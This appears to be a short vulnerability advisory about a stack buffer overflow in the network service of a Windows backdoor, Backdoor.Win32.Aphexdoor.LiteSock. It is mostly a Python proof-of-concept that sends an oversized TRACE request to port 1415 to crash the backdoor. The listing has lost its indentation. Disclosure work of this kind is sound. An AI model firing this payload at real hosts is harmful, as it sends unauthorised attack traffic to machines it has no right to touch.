Backdoor.Win32.Aphexdoor.LiteSock Buffer Overflow


Backdoor.Win32.Aphexdoor.LiteSock Buffer Overflow

Backdoor.Win32.Aphexdoor.LiteSock malware suffers from a buffer overflow vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=1415

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PACKOLA="TRACE /"+"A"*72+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\X-Request-ID: "+"A"*72

s.send(PACKOLA)
s.close()

print("Backdoor.Win32.Aphexdoor.LiteSock / Remote Stack Buffer Overflow")
print("MD5: a8bb1744bedf43849ed808b7dfa32da4")
print("By Malvuln");


if __name__=="__main__":
doit()